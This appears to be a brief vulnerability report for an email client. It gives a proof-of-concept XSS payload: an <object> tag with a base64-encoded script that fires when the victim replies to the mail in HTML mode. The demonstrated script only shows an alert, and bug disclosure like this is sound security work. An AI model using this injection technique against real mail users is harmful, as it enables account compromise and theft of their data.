Attacker send a mail with XSS payload to the victim Payload: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> XSS will be triggered when victim try to reply this mail (HTML Mode)